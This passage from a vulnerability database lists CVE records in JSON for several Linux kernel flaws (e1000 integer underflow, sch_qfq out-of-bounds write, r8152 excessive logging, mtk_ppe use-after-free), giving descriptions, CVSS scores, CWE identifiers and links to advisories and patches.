http://www.mandriva.com/security/advisories?name=MDVSA-2009:148vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/35656third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2009/dsa-1844vendor-advisory, x_refsource_DEBIAN
http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlx_refsource_CONFIRM
http://www.redhat.com/support/errata/RHSA-2009-1193.htmlvendor-advisory, x_refsource_REDHAT
http://www.intel.com/support/network/sb/CS-030543.htmx_refsource_CONFIRM
http://secunia.com/advisories/35566third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/54892vdb-entry, x_refsource_OSVDB
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11598vdb-entry, signature, x_refsource_OVAL
http://www.redhat.com/support/errata/RHSA-2009-1157.htmlvendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/35185vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/505254/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/35623third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/507985/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/36051third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36327third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-793-1vendor-advisory, x_refsource_UBUNTU
https://bugzilla.redhat.com/show_bug.cgi?id=502981x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2009/06/03/2mailing-list, x_refsource_MLIST
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11681vdb-entry, signature, x_refsource_OVAL
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc8x_refsource_CONFIRM
https://rhn.redhat.com/errata/RHSA-2009-1550.htmlvendor-advisory, x_refsource_REDHAT
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8340vdb-entry, signature, x_refsource_OVAL
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.htmlvendor-advisory, x_refsource_FEDORA
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=ea30e11970a96cfe5e32c03a29332554573b4a10x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.htmlvendor-advisory, x_refsource_SUSE
http://www.vupen.com/english/advisories/2009/3316vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/35847third-party-advisory, x_refsource_SECUNIA
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:13:25.510Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "35265",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35265"
          },
          {
            "name": "MDVSA-2009:135",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:135"
          },
          {
            "name": "DSA-1865",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1865"
          },
          {
            "name": "20100625 VMSA-2010-0010 ESX 3.5 third party update for Service Console kernel",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0111"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://sourceforge.net/project/shownotes.php?release_id=504022\u0026group_id=42302"
          },
          {
            "name": "36131",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36131"
          },
          {
            "name": "FEDORA-2009-6883",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.html"
          },
          {
            "name": "FEDORA-2009-6768",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.html"
          },
          {
            "name": "37471",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37471"
          },
          {
            "name": "MDVSA-2009:148",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:148"
          },
          {
            "name": "35656",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35656"
          },
          {
            "name": "DSA-1844",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1844"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
          },
          {
            "name": "RHSA-2009:1193",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.intel.com/support/network/sb/CS-030543.htm"
          },
          {
            "name": "35566",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35566"
          },
          {
            "name": "54892",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/54892"
          },
          {
            "name": "oval:org.mitre.oval:def:11598",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11598"
          },
          {
            "name": "RHSA-2009:1157",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1157.html"
          },
          {
            "name": "35185",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/35185"
          },
          {
            "name": "20090724 rPSA-2009-0111-1 kernel",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505254/100/0/threaded"
          },
          {
            "name": "35623",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35623"
          },
          {
            "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
          },
          {
            "name": "36051",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36051"
          },
          {
            "name": "36327",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36327"
          },
          {
            "name": "USN-793-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/usn-793-1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502981"
          },
          {
            "name": "[oss-security] 20090603 CVE-2009-1385 kernel: e1000_clean_rx_irq() denial of service",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/06/03/2"
          },
          {
            "name": "oval:org.mitre.oval:def:11681",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11681"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc8"
          },
          {
            "name": "RHSA-2009:1550",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://rhn.redhat.com/errata/RHSA-2009-1550.html"
          },
          {
            "name": "oval:org.mitre.oval:def:8340",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8340"
          },
          {
            "name": "FEDORA-2009-6846",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=ea30e11970a96cfe5e32c03a29332554573b4a10"
          },
          {
            "name": "SUSE-SA:2009:038",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.html"
          },
          {
            "name": "ADV-2009-3316",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3316"
          },
          {
            "name": "35847",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35847"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-06-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "35265",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35265"
        },
        {
          "name": "MDVSA-2009:135",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:135"
        },
        {
          "name": "DSA-1865",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1865"
        },
        {
          "name": "20100625 VMSA-2010-0010 ESX 3.5 third party update for Service Console kernel",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0111"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://sourceforge.net/project/shownotes.php?release_id=504022\u0026group_id=42302"
        },
        {
          "name": "36131",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36131"
        },
        {
          "name": "FEDORA-2009-6883",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.html"
        },
        {
          "name": "FEDORA-2009-6768",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.html"
        },
        {
          "name": "37471",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37471"
        },
        {
          "name": "MDVSA-2009:148",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:148"
        },
        {
          "name": "35656",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35656"
        },
        {
          "name": "DSA-1844",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1844"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
        },
        {
          "name": "RHSA-2009:1193",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.intel.com/support/network/sb/CS-030543.htm"
        },
        {
          "name": "35566",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35566"
        },
        {
          "name": "54892",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/54892"
        },
        {
          "name": "oval:org.mitre.oval:def:11598",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11598"
        },
        {
          "name": "RHSA-2009:1157",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1157.html"
        },
        {
          "name": "35185",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/35185"
        },
        {
          "name": "20090724 rPSA-2009-0111-1 kernel",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505254/100/0/threaded"
        },
        {
          "name": "35623",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35623"
        },
        {
          "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
        },
        {
          "name": "36051",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36051"
        },
        {
          "name": "36327",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36327"
        },
        {
          "name": "USN-793-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/usn-793-1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502981"
        },
        {
          "name": "[oss-security] 20090603 CVE-2009-1385 kernel: e1000_clean_rx_irq() denial of service",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/06/03/2"
        },
        {
          "name": "oval:org.mitre.oval:def:11681",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11681"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc8"
        },
        {
          "name": "RHSA-2009:1550",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://rhn.redhat.com/errata/RHSA-2009-1550.html"
        },
        {
          "name": "oval:org.mitre.oval:def:8340",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8340"
        },
        {
          "name": "FEDORA-2009-6846",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=ea30e11970a96cfe5e32c03a29332554573b4a10"
        },
        {
          "name": "SUSE-SA:2009:038",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.html"
        },
        {
          "name": "ADV-2009-3316",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3316"
        },
        {
          "name": "35847",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35847"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2009-1385",
    "datePublished": "2009-06-04T16:00:00",
    "dateReserved": "2009-04-23T00:00:00",
    "dateUpdated": "2024-08-07T05:13:25.510Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3611
Vulnerability from cvelistv5
Published
2023-07-21 20:49
Modified
2024-08-02 07:01
Severity
Summary
Out-of-bounds write in Linux kernel's net/sched: sch_qfq component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:01:57.288Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5480"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230908-0002/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "3.8",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Lion"
        }
      ],
      "datePublic": "2023-07-13T09:11:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eAn out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.\u003c/p\u003e"
            }
          ],
          "value": "An out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\n\nWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787 Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-22T09:43:12.163Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64"
        },
        {
          "url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5480"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230908-0002/"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Out-of-bounds write in Linux kernel\u0027s net/sched: sch_qfq component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3611",
    "datePublished": "2023-07-21T20:49:10.812Z",
    "dateReserved": "2023-07-10T20:52:55.365Z",
    "dateUpdated": "2024-08-02T07:01:57.288Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3594
Vulnerability from cvelistv5
Published
2022-10-18 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF r8152.c intr_callback logging of excessive data
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.039Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211363"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-779 Logging of Excessive Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907"
        },
        {
          "url": "https://vuldb.com/?id.211363"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel BPF r8152.c intr_callback logging of excessive data",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3594",
    "datePublished": "2022-10-18T00:00:00",
    "dateReserved": "2022-10-18T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.039Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3636
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Ethernet mtk_ppe.c __mtk_ppe_check_skb use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.212Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/pabeni/net-next.git/commit/?id=17a5f6a78dc7b8db385de346092d7d9f9dc24df6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211935"
          },
          {
            "name": "DSA-5333",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5333"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
